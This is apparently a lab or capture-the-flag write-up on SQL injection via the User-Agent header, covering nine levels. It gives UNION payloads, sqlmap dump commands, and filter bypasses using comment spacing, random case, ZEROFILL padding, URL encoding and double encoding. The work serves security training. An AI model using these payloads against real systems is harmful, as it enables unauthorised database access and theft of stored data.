SQL Injection
Level 1
The application reads the user agent value and then shows that . By changing the value to a single quote we can get the following error which reveals that MySQL is in use.
' UNION SELECT user(); -- -
otherise save the request from Burp and use SQLMap
sqlmap -r level1 --banner -D 1sqlilabs -T browsers --dump
Level 2
In this level UNION and standard payloads are filtered.
sqlmap -u 'http://2.sqli.labs/' -p user-agent --user-agent=elsagent --technique=B --banner
Level 3
This level spaces are not allowed.
/'/**/UNION/**/SELECT/**/@@version;#
sqlmap -u 'http://3.sqli.labs/' -p user-agent --user-agent=blah --banner --tamper=space2comment
Level 4
Comments are blocked in this level.
'UNION(select('PoC String'));#
# Enumerating the tables
'union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#
# Enumerating the columns
'union(SELECT(group_concat(column_name))FROM(information_schema.columns)where(table_name='secretcustomers'));#
Level 5
Same as above, but had to use double quotes.
Level 6
Needed a random case with every letter to bypass the filter. SQLMap randomcase tamper script can be used for this level.
Level 7
Non-recursive filter for the reserved words.
' uZEROFILLnZEROFILLiZEROFILLoZEROFILLnZEROFILL ZEROFILLsZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt ZEROFILL@@ZEROFILLvZEROFILLeZEROFILLrZEROFILLsZEROFILLiZEROFILLoZEROFILLnZEROFILL; ZEROFILL-- ZEROFILL-ZEROFILL
Level 8
URL encoding.
%61%61%61%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%3b%20%2d%2d%20%2d
Level 9
Double char encode.
%25%36%31%25%36%31%25%36%31%25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%33%62%25%32%30%25%32%64%25%32%64%25%32%30%25%32%64
sqlmap -u 'http://9.sqli.labs/' -p user-agent --tamper=chardoubleencode --banner --level=3
Last updated